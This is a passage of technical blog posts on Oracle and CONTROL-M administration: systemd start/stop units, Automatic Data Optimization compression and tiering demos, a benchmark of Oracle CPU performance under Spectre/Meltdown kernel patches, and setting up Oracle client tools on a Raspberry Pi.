    echo "Starting CONTROL-M Server"
    su - ctmuser -c /home/ctmuser/ctm_server/scripts/start_ctm &
    sleep 5
    fi

    # start CONTROL-M Configuration Agent at boot
    if [ -f /home/ctmuser/ctm_server/scripts/start_ca ]; then
    echo "Starting CONTROL-M Server Configuration Agent"
    su - ctmuser -c /home/ctmuser/ctm_server/scripts/start_ca &
    sleep 5
    fi

    exit 0

    ctmsrv%

 

The existing BMC procedure does not include any script to be run when the service or the physical server is shut down. Processes will then simply be killed, which does not guarantee a proper stop of the application and, most importantly, of the internal PostgreSQL database.
With ctmuser, create a new rc file for the stop phase. Let's name the file rc.stop.ctmuser and locate it in the same /home/ctmuser/ctm_server/data directory. The file content will be the following.

    ctmsrv% cat /home/ctmuser/ctm_server/data/rc.stop.ctmuser
    # stop CONTROL-M Configuration Agent at poweroff/reboot
    if [ -f /home/ctmuser/ctm_server/scripts/shut_ca ]; then
      echo "Stopping CONTROL-M Server Configuration Agent"
      su - ctmuser -c /home/ctmuser/ctm_server/scripts/shut_ca &
      sleep 5
    fi

    # stop CONTROL-M Server at poweroff/reboot
    if [ -f /home/ctmuser/ctm_server/scripts/shut_ctm ]; then
      echo "Stopping CONTROL-M Server"
      su - ctmuser -c /home/ctmuser/ctm_server/scripts/shut_ctm &
      sleep 5
    fi

    # stop database at poweroff/reboot
    if [ -f /home/ctmuser/ctm_server/scripts/shutdb ]; then
      echo "Stopping SQL server for CONTROL-M"
      su - ctmuser -c shutdb
      echo "Sleeping for 20"
      sleep 20
    fi


    exit 0

 

With root privileges, create the service file as below. We are adding the ExecStop part in addition to the existing BMC procedure.

    [root@ctmsrv system]# cat /etc/systemd/system/ctmserver.service
    [Unit]
    Description=CONTROL-M Server
    After=systemd-user-sessions.service multi-user.target network.target
    [Service]
    ExecStart=/bin/sh -c /home/ctmuser/ctm_server/data/rc.ctmuser
    ExecStop=/bin/sh -c /home/ctmuser/ctm_server/data/rc.stop.ctmuser
    Type=forking
    RemainAfterExit=yes
    [Install]
    WantedBy=multi-user.target

 

Give appropriate file permissions and enable the service. A system reboot will be necessary.

    [root@ctmsrv system]# chmod 644 ctmserver.service
    [root@ctmsrv system]# systemctl daemon-reload
    [root@ctmsrv system]# systemctl enable ctmserver.service
    Created symlink from /etc/systemd/system/multi-user.target.wants/ctmserver.service
      to /etc/systemd/system/ctmserver.service.
    [root@ctmsrv system]# systemctl reboot

 

A well-functioning test can be performed by running service ctmserver stop/start with root privileges (see the example after this list) and monitoring the results of:

  • watch ‘ps -ef | grep ctm’
  • ctm_menu
  • service ctmserver status
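
For example, with root privileges (on Oracle Linux 7 the service command is redirected to systemctl, so both forms are equivalent; the unit name matches the service file created above):

    systemctl stop ctmserver
    systemctl status ctmserver
    systemctl start ctmserver
    systemctl status ctmserver

The same kind of test applies to the ctmag and EM services described below.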
CONTROL-M/Agent

For the Agent we will apply the existing BMC procedure.
With root privileges, create the service file as described below.

    [root@ctmagtli1 system]# cat /etc/systemd/system/ctmag.service
    [Unit]
    Description=CONTROL-M Agent
    [Service]
    Type=forking
    RemainAfterExit=yes
    ExecStart=/home/ctmuser/ctmagent/ctm/scripts/rc.agent_user start
    ExecStop=/home/ctmuser/ctmagent/ctm/scripts/rc.agent_user stop
    [Install]
    WantedBy=multi-user.target

 

Give appropriate file permissions and enable the service. A system reboot will be necessary.

    [root@ctmagtli1 system]# chmod 644 ctmag.service
    [root@ctmagtli1 system]# systemctl daemon-reload
    [root@ctmagtli1 system]# systemctl enable ctmag.service
    Created symlink from /etc/systemd/system/multi-user.target.wants/ctmag.service
      to /etc/systemd/system/ctmag.service.
    [root@ctmagtli1 system]# systemctl reboot

 

A well-functioning test can be performed by running service ctmag stop/start with root privileges and monitoring the results of:

  • watch ‘ps -ef | grep ctm’
  • /home/ctmuser/ctmagent/ctm/scripts/ag_diag_comm
  • service ctmag status
CONTROL-M/EM

For EM we will apply the existing BMC procedure.
With root privileges, create the service file as described below.

    [root@emserver system]# cat /etc/systemd/system/EM.service
    [Unit]
    Description=CONTROL-M/EM
    After=systemd-user-sessions.service multi-user.target network.target
    [Service]
    User=emuser
    ExecStart=/bin/sh -c /home/emuser/bin/start_server;/home/emuser/bin/start_ns_daemon;/home/emuser/bin/start_cms;/home/emuser/bin/start_config_agent
    Type=forking
    RemainAfterExit=yes
    ExecStop=/bin/sh -c /home/emuser/bin/stop_config_agent;/home/emuser/bin/stop_cms;/home/emuser/bin/stop_ns_daemon;/home/emuser/bin/stop_server
    [Install]
    WantedBy=multi-user.target

 

Give appropriate file permissions and enable the service. A system reboot will be necessary.

    [root@emserver system]# chmod 644 EM.service
    [root@emserver system]# systemctl daemon-reload
    [root@emserver system]# systemctl enable EM.service
    Created symlink from /etc/systemd/system/multi-user.target.wants/EM.service
      to /etc/systemd/system/EM.service.
    [root@emserver system]# systemctl reboot

 

A well-functioning test can be performed by running service EM stop/start with root privileges and monitoring the results of:

  • watch ‘ps -ef | grep em’
  • root_menu
  • service EM status

 

 

The post Automatic start/stop for CONTROL-M v9 appeared first on Blog dbi services.

Automatic Data Optimization Part II : StorageTiering

Thu, 2018-01-11 12:07

In a previous blog post, we saw how Automatic Data Optimization can be used to compress data under predefined conditions. In this blog we will see that another possible action with ADO is to move data to another storage tier. Indeed, we will demonstrate how a table can be moved to another tablespace based on predefined conditions.
We are using an Oracle 12.1.0.2 non-CDB database.
Let's consider the following table ARTICLE in the USERS tablespace

SQL> col TABLE_NAME for a20
SQL> select table_name,tablespace_name from user_tables where table_name='ARTICLE';
TABLE_NAME TABLESPACE_NAME
-------------------- ------------------------------
ARTICLE USERS

Now let's create a target tablespace named COOLTAB. The ARTICLE table will be moved to this new COOLTAB tablespace depending on the conditions we will define.

SQL> create tablespace COOLTAB datafile '/u01/app/oracle/oradata/NONCONT/cooltab01.dbf' size 50M;
Tablespace created.

As specified in the previous blog, the Heat Map must be enabled by setting the parameter HEAT_MAP to ON.

SQL> show parameter heat_map;
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string ON

We can verify that heat map statistics are collected for table ARTICLE. It can be useful to gather statistics for ARTICLE using DBMS_STATS.

SQL> SELECT OBJECT_NAME, to_char(TRACK_TIME,'DD-MON-YYYY HH24:MI:SS'), SEGMENT_WRITE "Seg_write",SEGMENT_READ "Seg_read", FULL_SCAN, LOOKUP_SCAN FROM v$heat_map_segment WHERE object_name='ARTICLE';
OBJECT_NAME TO_CHAR(TRACK_TIME,'DD-MON-YY Seg Seg FUL LOO
------------------------------ ----------------------------- --- --- --- ---
ARTICLE 10-JAN-2018 09:40:48 NO NO YES NO

Before creating the storage tiering policy, let’s verify the status of our tablespaces. We can see that all the tablespaces are online

SQL> select tablespace_name,status from dba_tablespaces;
TABLESPACE_NAME STATUS
------------------------------ ---------
SYSTEM ONLINE
SYSAUX ONLINE
UNDOTBS1 ONLINE
TEMP ONLINE
USERS ONLINE
EXAMPLE ONLINE
COOLTAB ONLINE
7 rows selected.

Now we are going to define a tiering policy which will move the ARTICLE table from the USERS tablespace to COOLTAB if there has been no access to ARTICLE in the last 30 days. The policy will also put the COOLTAB tablespace in READ ONLY status.

SQL> ALTER TABLE ARTICLE ILM ADD POLICY TIER TO COOLTAB READ ONLY SEGMENT AFTER 30 DAYS OF NO ACCESS;
Table altered.

If we query DBA_ILMPARAMETERS, we can see that, for the demonstration, POLICY TIME is set to 1. This means that 30 days are treated as 30 seconds.

SQL> select * from dba_ilmparameters;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 1
8 rows selected.

We can verify that the policy is created

SELECT policy_name, action_type, condition_type, condition_days FROM user_ilmdatamovementpolicies where action_type='STORAGE';
POLICY_NAM ACTION_TYPE CONDITION_TYPE CONDITION_DAYS
---------- ----------- ---------------------- --------------
P65 STORAGE LAST ACCESS TIME 30

And that the policy is enabled

SQL> SELECT policy_name, object_name, enabled FROM user_ilmobjects where policy_name='P65';
POLICY_NAM OBJECT_NAME ENA
---------- --------------- ---
P65 ARTICLE YES

By default, ADO policies are automatically triggered during the maintenance window, but in this demonstration we are going to execute the policy manually without waiting for the maintenance window. So after 30 days of no access (in fact 30 seconds) let's trigger the policy

SQL> EXEC dbms_ilm.flush_all_segments;
PL/SQL procedure successfully completed.
.
DECLARE
v_executionid number;
BEGIN
dbms_ilm.execute_ILM (ILM_SCOPE => dbms_ilm.SCOPE_SCHEMA,
execution_mode => dbms_ilm.ilm_execution_offline,
task_id => v_executionid);
END;
/
PL/SQL procedure successfully completed.

Let’s verify the result of the job. We can see that the job was successful

SQL> SELECT task_id, job_name, job_state, completion_time completion FROM user_ilmresults ORDER BY 1 ;
TASK_ID
----------
JOB_NAME
--------------------------------------------------------------------------------
JOB_STATE
-----------------------------------
COMPLETION
---------------------------------------------------------------------------
86
ILMJOB232
COMPLETED SUCCESSFULLY
10-JAN-18 02.28.31.506590 PM

And if we query USER_TABLES again, we can see that the ARTICLE table was moved from the USERS tablespace to the COOLTAB tablespace.

SQL> col TABLE_NAME for a20
SQL> select table_name,tablespace_name from user_tables where table_name='ARTICLE';
TABLE_NAME TABLESPACE_NAME
-------------------- ------------------------------
ARTICLE COOLTAB

And if we query dba_tablespaces, we can see that the COOLTAB tablespace is now in READ ONLY status

SQL> select tablespace_name,status from dba_tablespaces;
TABLESPACE_NAME STATUS
------------------------------ ---------
SYSTEM ONLINE
SYSAUX ONLINE
UNDOTBS1 ONLINE
TEMP ONLINE
USERS ONLINE
EXAMPLE ONLINE
COOLTAB READ ONLY
7 rows selected.

Conclusion: We have seen how ADO can help us move data. Note that this movement can also be based on a fullness threshold of the source tablespace: one condition could be, for example, to move the table when the source tablespace is 65% full, as sketched below.
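
As a sketch (not executed in this demo), such a fullness-based policy could look like this: the TBS PERCENT USED/FREE thresholds seen in DBA_ILMPARAMETERS are customized, and a TIER TO policy without a time condition is added so that the movement is driven by the tablespace fullness.

-- adjust the fullness thresholds (the values are just an example)
EXEC dbms_ilm_admin.customize_ilm(dbms_ilm_admin.TBS_PERCENT_USED, 65);
EXEC dbms_ilm_admin.customize_ilm(dbms_ilm_admin.TBS_PERCENT_FREE, 15);
-- a TIER TO policy with no AFTER condition is triggered when the source tablespace crosses the threshold
ALTER TABLE ARTICLE ILM ADD POLICY TIER TO COOLTAB;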

 

The post Automatic Data Optimization Part II : StorageTiering appeared first on Blog dbi services.

Automatic Data Optimization Part I : Compression Tiering

Wed, 2018-01-10 15:15

Nowadays data volumes keep increasing, and two challenges we often face are how to reduce storage costs and how to improve performance. With Oracle 12c, the Automatic Data Optimization (ADO) feature can help us.
In this first blog we will see how we can use ADO to compress data under predefined conditions.
ADO is part of Information Lifecycle Management (ILM). Note that ADO requires the Advanced Compression option.
In this article we are using an Oracle 12.1.0.2 non-CDB database.
First let’s create the user we will use for the demonstration

SQL> create user app identified by app default tablespace users temporary tablespace temp;
User created.
.
SQL> grant create session,create table,alter tablespace,select any dictionary,unlimited tablespace to app;
Grant succeeded.

Now, with this user, let's create a table and insert some data
SQL> show user
USER is "APP"
SQL> create table article(idart number,designation varchar2(20));
Table created.
.
SQL> select count(*) from article;
COUNT(*)
----------
1048576
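
The INSERT statements are not shown in the transcript above; a possible way to generate a comparable volume of test data (about one million rows – an illustration only, not the exact statements used for this demo) is:

insert into article
  select rownum, 'DESIGNATION '||rownum
  from dual
  connect by level <= power(2,20);
commit;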

What we will demonstrate is how data in the ARTICLE table can be automatically compressed if it has not been modified within the last 30 days, for example. This is just one example; many other conditions are possible.
First let’s verify that the compression attribute of the table article is disabled
SQL> show user
USER is "APP"
SQL> SELECT compression, compress_for FROM user_tables WHERE table_name = 'ARTICLE';
COMPRESS COMPRESS_FOR
-------- ------------------------------
DISABLED

We can also confirm that there is no compression in the table using this oracle script.
[oracle@serverora1 ]$ cat comp_art.sql
SELECT CASE compression_type
WHEN 1 THEN 'No Compression'
WHEN 2 THEN 'Advanced compression level'
WHEN 4 THEN 'Hybrid Columnar Compression for Query High'
WHEN 8 THEN 'Hybrid Columnar Compression for Query Low'
WHEN 16 THEN 'Hybrid Columnar Compression for Archive High'
WHEN 32 THEN 'Hybrid Columnar Compression for Archive Low'
WHEN 64 THEN 'Compressed row'
WHEN 128 THEN 'High compression level for LOB operations'
WHEN 256 THEN 'Medium compression level for LOB operations'
WHEN 512 THEN 'Low compression level for LOB operations'
WHEN 1000 THEN 'Minimum required number of LOBs in the object for which LOB compression ratio is to be estimated'
WHEN 4096 THEN 'Basic compression level'
WHEN 5000 THEN 'Maximum number of LOBs used to compute the LOB compression ratio'
WHEN 1000000 THEN 'Minimum required number of rows in the object for which HCC ratio is to be estimated'
WHEN -1 THEN 'To indicate the use of all the rows in the object to estimate HCC ratio'
ELSE 'Unknown Compression Type'
END AS compression_type, n as num_rows
FROM (SELECT compression_type, Count(*) n
FROM (SELECT dbms_compression.Get_compression_type(USER, 'ARTICLE', ROWID) AS COMPRESSION_TYPE
FROM app.article)
GROUP BY compression_type
);
[oracle@serverora1 ]$

Below we can see that there is no compressed data
SQL> col COMPRESSION_TYPE for a20
SQL> @comp_art
COMPRESSION_TYPE NUM_ROWS
-------------------- ----------
No Compression 1048576

To use ADO for compression, Heat Map must be enabled. Once enabled, Heat Map collects the statistics required for ADO actions: all accesses are tracked by the in-memory activity tracking module. So let's enable Heat Map at the instance level

SQL> show parameter heat
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string OFF
.
SQL> alter system set heat_map=ON scope=both;
System altered.
.
SQL> show parameter heat
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string ON

By default, the policy time is specified in days. If we query DBA_ILMPARAMETERS, the value of POLICY TIME determines whether ADO policies are specified in seconds or days: 1 means seconds, 0 means days (the default).

SQL> col name for a20
SQL> select * from DBA_ILMPARAMETERS;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 0
8 rows selected.

But in our demonstration we do not want to wait 30 days, so we set the policy time to seconds instead of days: when we then specify 30 days, it actually means 30 seconds.

SQL> EXEC dbms_ilm_admin.customize_ilm(dbms_ilm_admin.POLICY_TIME,dbms_ilm_admin.ILM_POLICY_IN_SECONDS);
PL/SQL procedure successfully completed.
.
SQL> select * from DBA_ILMPARAMETERS;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 1
8 rows selected.
SQL>

Before adding the ADO policy, we can verify that heat map statistics are already collected.

SELECT OBJECT_NAME, to_char(TRACK_TIME,'DD-MON-YYYY HH24:MI:SS'), SEGMENT_WRITE "Seg_write",
SEGMENT_READ "Seg_read", FULL_SCAN, LOOKUP_SCAN
FROM v$heat_map_segment WHERE object_name='ARTICLE';
.
OBJECT_NAME TO_CHAR(TRACK_TIME,'DD-MON-YY Seg Seg FUL LOO
------------------------------ ----------------------------- --- --- --- ---
ARTICLE 08-JAN-2018 17:02:21 NO NO YES NO
SQL>

Now let’s add a segment level row compression policy on ARTICLE table that will compress the segment when no modification on the segment will have occurred in the last 30 days (considered as 30 seconds due to the policy time).

SQL> show user
USER is "APP"
SQL> ALTER TABLE app.article ILM ADD POLICY ROW STORE COMPRESS ADVANCED SEGMENT AFTER 30 DAYS OF NO MODIFICATION;
Table altered.
SQL>

We can query the USER_ILMDATAMOVEMENTPOLICIES and USER_ILMOBJECTS views as user APP to verify the policy.

SQL> show user
USER is "APP"
SQL> SELECT policy_name, action_type, scope, compression_level, condition_type, condition_days FROM user_ilmdatamovementpolicies ORDER BY policy_name;
POLICY_NAME ACTION_TYPE SCOPE COMPRESSION_LEVEL CONDITION_TYPE CONDITION_DAYS
--------------- ----------- ------- ----------------- ---------------------- --------------
P45 COMPRESSION SEGMENT ADVANCED LAST MODIFICATION TIME 30
.
SQL> SELECT policy_name, object_name, enabled FROM user_ilmobjects;
POLICY_NAME OBJECT_NAME ENA
--------------- -------------------- ---
P45 ARTICLE YES

Let's flush the Heat Map statistics from memory to disk and wait 30 days (in fact 30 seconds, because the policy time was changed to seconds instead of days). It can also sometimes be useful to gather the statistics of the table, as shown right after the flush below.

SQL> EXEC dbms_ilm.flush_all_segments;
PL/SQL procedure successfully completed.
SQL>
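As mentioned above, gathering the table statistics can also help; a minimal sketch (not part of the original run):

SQL> EXEC dbms_stats.gather_table_stats(ownname => 'APP', tabname => 'ARTICLE');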

By default, ADO policies are automatically evaluated and executed during the maintenance window. But in this demonstration we are going to execute the policy manually, without waiting for the maintenance window.

SQL> show user
USER is "APP"
SQL> DECLARE
v_executionid number;
BEGIN
dbms_ilm.execute_ILM (ILM_SCOPE => dbms_ilm.SCOPE_SCHEMA,
execution_mode => dbms_ilm.ilm_execution_offline,
task_id => v_executionid);
END;
/
PL/SQL procedure successfully completed.
SQL>

Some info about the job can be obtained in the following views

SQL> SELECT task_id, start_time as start_time FROM user_ilmtasks order by 1;
TASK_ID
----------
START_TIME
---------------------------------------------------------------------------
26
08-JAN-18 05.28.45.788076 PM
SQL>
.
SQL> SELECT task_id, job_name, job_state, completion_time completion
FROM user_ilmresults ORDER BY 1 ;
TASK_ID
----------
JOB_NAME
--------------------------------------------------------------------------------
JOB_STATE
-----------------------------------
COMPLETION
---------------------------------------------------------------------------
26
ILMJOB98
COMPLETED SUCCESSFULLY
08-JAN-18 05.28.49.368009 PM

We can see that the job ran successfully, and we can verify that compression on the ARTICLE table is now enabled:

SQL> SELECT compression, compress_for FROM user_tables WHERE table_name = 'ARTICLE';
COMPRESS COMPRESS_FOR
-------- ------------------------------
ENABLED ADVANCED
SQL>

And we also can see that all rows are compressed.

SQL> col COMPRESSION_TYPE for a20
SQL> @comp_art.sql
COMPRESSION_TYPE NUM_ROWS
-------------------- ----------
Advanced compression 1048576
level

Conclusion: in this first part we have seen how ADO can help us with compression. In a second post we will talk about data movement with ADO.

 

The post Automatic Data Optimization Part I: Compression Tiering appeared first on the dbi services blog.

Spectre and Meltdown, Oracle Database, AWS, SLOB

Tue, 2018-01-09 15:23

Last year, I measured the CPU performance for an Oracle Database on several types of AWS instances. Just by curiosity, I’ve run the same test (SLOB cached reads) now that Amazon has applied all Spectre and Meltdown mitigation patches.

I must admit that I wanted to test this on the Oracle Cloud first. I've updated an IaaS instance to the latest kernel, but the Oracle Unbreakable Enterprise Kernel does not include the Meltdown fix yet, and booting on the Red Hat Compatible Kernel quickly ends in a kernel panic, not finding the root LVM.

This is not a benchmark you can rely on to estimate the CPU overhead on your application. This test is not doing system calls (so the KPTI fix should have minimal impact here). If your application is bound on system calls (network roundtrips, physical reads), the consequences can be worse. But in that case, you have a design problem which was just masked by hardware that is optimized, but insecure, because the processor runs code speculatively before testing it.

Figures from last year: M4.xlarge: 4vCPU, 16GB RAM

M4 is hyper-threaded so with 2 Oracle processor licenses we can use 4 vCPU.
Here I was on Intel(R) Xeon(R) CPU E5-2686 v4 @ 2.30GHz, 2 cores with 2 threads each.
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 13.1 0.00 5.46
DB CPU(s): 1.0 13.1 0.00 5.46
Logical read (blocks): 874,326.7 11,420,189.2

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 2.0 27.3 0.00 9.24
DB CPU(s): 2.0 27.2 0.00 9.22
Logical read (blocks): 1,540,116.9 21,047,307.6

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 4.0 54.6 0.00 14.46
DB CPU(s): 4.0 54.3 0.00 14.39
Logical read (blocks): 1,779,361.3 24,326,538.0

Jan. 2018 with Spectre and Meltdown mitigation:

Same CPU now with the latest RedHat kernel.

[ec2-user@ip-172-31-15-31 ~]$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-3.10.0-693.11.6.el7.x86_64 root=UUID=3e11801e-5277-4d87-be4c-0a9a61fbc3da ro console=ttyS0,115200n8 console=tty0 net.ifnames=0 crashkernel=auto LANG=en_US.UTF-8

Here is the LIOPS result for the same runs.
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 13.7 0.00 4.69
DB CPU(s): 1.0 13.7 0.00 4.69
Logical read (blocks): 808,954.0 11,048,988.1

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 2.0 27.3 0.00 8.00
DB CPU(s): 2.0 27.1 0.00 7.96
Logical read (blocks): 1,343,662.0 18,351,369.1

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 4.0 42.9 0.00 13.49
DB CPU(s): 4.0 42.5 0.00 13.37
Logical read (blocks): 1,684,204.6 18,106,823.6

Jan. 2018, with Spectre and Meltdown patches, but disabled IBRS, IBPB, KPTI

The RedHat kernel has options to disable Indirect Branch Restricted Speculation, Indirect Branch Prediction Barriers and Kernel Page Table Isolation
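As an aside (an assumption based on Red Hat's documentation for these kernels, not something tested in this post), the mitigations can reportedly also be toggled at runtime through debugfs, which avoids a reboot:

# as root, assuming the RHEL 7 debugfs switches are present on this kernel
echo 0 > /sys/kernel/debug/x86/pti_enabled    # Kernel Page Table Isolation
echo 0 > /sys/kernel/debug/x86/ibrs_enabled   # Indirect Branch Restricted Speculation
echo 0 > /sys/kernel/debug/x86/ibpb_enabled   # Indirect Branch Prediction Barriers

Here, however, the kernel boot parameters were used: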

[ec2-user@ip-172-31-15-31 ~]$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-3.10.0-693.11.6.el7.x86_64 root=UUID=3e11801e-5277-4d87-be4c-0a9a61fbc3da ro console=ttyS0,115200n8 console=tty0 net.ifnames=0 crashkernel=auto LANG=en_US.UTF-8 nopti noibrs noibpb

Here are the same runs after rebooting with nopti noibrs noibpb kernel options:
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 30.1 0.00 4.86
DB CPU(s): 1.0 29.8 0.00 4.80
Logical read (blocks): 861,138.5 25,937,061.0

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 2.0 27.3 0.00 8.00
DB CPU(s): 2.0 27.0 0.00 7.92
Logical read (blocks): 1,493,336.8 20,395,790.6

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 4.0 42.9 0.00 13.49
DB CPU(s): 4.0 42.4 0.00 13.34
Logical read (blocks): 1,760,218.4 18,911,346.0
Read IO requests: 33.5 360.2

Then with only KPTI disabled, but all Spectre mitigation enabled

Here only the page table isolation is disabled.

[ec2-user@ip-172-31-15-31 ~]$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-3.10.0-693.11.6.el7.x86_64 root=UUID=3e11801e-5277-4d87-be4c-0a9a61fbc3da ro console=ttyS0,115200n8 console=tty0 net.ifnames=0 crashkernel=auto LANG=en_US.UTF-8 nopti

Here are the same runs with only the nopti kernel option:
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 30.1 0.00 3.91
DB CPU(s): 1.0 29.8 0.00 3.87
Logical read (blocks): 873,451.2 26,303,984.2

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 2.0 23.1 0.00 7.60
DB CPU(s): 2.0 22.9 0.00 7.54
Logical read (blocks): 1,502,151.4 17,360,883.8

Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 4.0 42.9 0.00 12.64
DB CPU(s): 4.0 42.4 0.00 12.50
Logical read (blocks): 1,764,293.0 18,954,682.3

Large pages

The previous tests were using small pages. I did a quick test with KPTI enabled and SGA using large pages:
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 30.1 0.00 4.85
DB CPU(s): 1.0 30.1 0.00 4.85
Logical read (blocks): 854,682.1 27,672,906.8

Here is the same but with KPTI disabled:
Load Profile Per Second Per Transaction Per Exec Per Call
~~~~~~~~~~~~~~~ --------------- --------------- --------- ---------
DB Time(s): 1.0 30.1 0.00 4.85
DB CPU(s): 1.0 30.1 0.00 4.85
Logical read (blocks): 920,129.9 27,672,906.8

So what?

This is just a test on a synthetic workload. Nothing similar to a production database situation. However, those cached SLOB runs are doing what an optimized database application should do most of the time: read blocks from the buffer cache. At least this test is much better than the graphs without explanations, or the SELECT 1, that I have seen these days on social media.

Some interesting food for thought in those numbers, by the way.

Now vs. last year: between 5% and 12% degradation, which is in line with what people have reported these days. That looks high, but usually when we do database performance troubleshooting we are there to address queries with x10 to x100 CPU usage doing unnecessary work because of bad design or a suboptimal execution plan.

If we disable KPTI: the degradation is less than 1%, so that's an easy way to get back the same performance if you are sure that you control all the software running, at least temporarily, until some database tuning is done.

If we disable KPTI, IBRS and IBPB: it is not better than disabling only KPTI. I have no explanation for that… It makes me wonder whether this predictive branching is always a good idea.

In any case, if you are not allocating the SGA with large pages, then you should. The KPTI degradation is lower with large pages, which makes sense as the page table is smaller. And if you are not yet using large pages, the benefit will probably offset the KPTI degradation.
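As a reminder of what that involves, here is a minimal sketch (the number of huge pages is a placeholder and must be sized to hold your SGA; USE_LARGE_PAGES is a standard instance parameter):

# /etc/sysctl.conf: reserve 2MB huge pages for the SGA (placeholder value)
vm.nr_hugepages = 2048

-- instance parameter: refuse to start the instance if the SGA cannot use large pages
SQL> alter system set use_large_pages='ONLY' scope=spfile;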

This is not a benchmark and your application may see a higher degradation if doing a lot of system calls. If you upgrade from an old kernel, you may even see an improvement thanks to other features compensating the mitigation ones.

 

The post Spectre and Meltdown, Oracle Database, AWS, SLOB appeared first on the dbi services blog.

Running the Oracle Client on a Raspberry Pi

Tue, 2018-01-09 11:57

What are the possibilities to use a Raspberry Pi computer as an Oracle client?


Among other things, I'll show in this blog a way to run the fat/thick Oracle Client on a Raspberry Pi!

REMARK: All examples below were made with a Raspberry Pi 3 and the Raspbian OS, which can be downloaded from

https://www.raspberrypi.org/downloads

First of all what’s possible with Java and Thin Clients?
Running the Java programs SQL Developer, or its command line counterpart sqlcl, is of course possible on a Raspberry Pi:

1.) sqldeveloper

The prerequisite for running sqldeveloper 17.4 (the current version as of writing this blog) is an installed JDK 1.8. As I had that installed by default, I could run sqldeveloper as documented, i.e.:


pi@raspberrypi:~ $ sudo apt list --installed | grep jdk
oracle-java8-jdk/stable,now 8u65 armhf [installed]
pi@raspberrypi:~ $ cd Oracle
pi@raspberrypi:~/Oracle $ unzip sqldeveloper-17.4.0.355.2349-no-jre.zip
...
pi@raspberrypi:~/Oracle $ cd sqldeveloper/
pi@raspberrypi:~/Oracle/sqldeveloper $ ./sqldeveloper.sh
 
Oracle SQL Developer
Copyright (c) 1997, 2017, Oracle and/or its affiliates. All rights reserved.

(screenshot: sqldeveloper)

2.) sqlcl

Installing sqlcl is as easy as installing sqldeveloper:


pi@raspberrypi:~/Oracle $ unzip sqlcl-17.4.0.354.2224-no-jre.zip
...
pi@raspberrypi:~/Oracle $ alias sqlcl='/home/pi/Oracle/sqlcl/bin/sql'
pi@raspberrypi:~/Oracle $ sqlcl cbleile/cbleile@192.168.178.65:1521/prem122.localdomain
 
SQLcl: Release 17.4.0 Production on Tue Jan 09 14:28:56 2018
 
Copyright (c) 1982, 2018, Oracle. All rights reserved.
 
Last Successful login time: Thu Jan 04 2018 22:15:36 +01:00
 
Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production
 
SQL> set sqlformat ansiconsole
SQL> select table_name, tablespace_name from tabs;
TABLE_NAME TABLESPACE_NAME
T1 USERS
 
SQL>

3.) Running Java-Code using the JDBC Thin driver

Running Java-Code with access to Oracle is easy as well. Just download the JDBC Thin Driver ojdbc8.jar and put it somewhere on the Pi. In the example below I actually do use the ojdbc8.jar from sqlcl:


pi@raspberrypi:~/Oracle/Java $ more Conn.java
import java.sql.*;
class Conn {
  public static void main (String[] args) throws Exception
  {
    Class.forName ("oracle.jdbc.OracleDriver");

    Connection conn = DriverManager.getConnection ("jdbc:oracle:thin:@//192.168.178.65:1521/prem122.localdomain", "cbleile", "cbleile");
    // @//machineName:port/SID, userid, password
    try {
      Statement stmt = conn.createStatement();
      try {
        ResultSet rset = stmt.executeQuery("select BANNER from SYS.V_$VERSION where BANNER like '%Enterprise Edition%'");
        try {
          while (rset.next())
            System.out.println ("Connected to "+rset.getString(1));
        }
        finally {
          try { rset.close(); } catch (Exception ignore) {}
        }
      }
      finally {
        try { stmt.close(); } catch (Exception ignore) {}
      }
    }
    finally {
      try { conn.close(); } catch (Exception ignore) {}
    }
  }
}
pi@raspberrypi:~/Oracle/Java $ javac Conn.java
pi@raspberrypi:~/Oracle/Java $ java -cp ../sqlcl/lib/ojdbc8.jar:. Conn
Connected to Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

4.) Running a fat Client on the Raspberry Pi

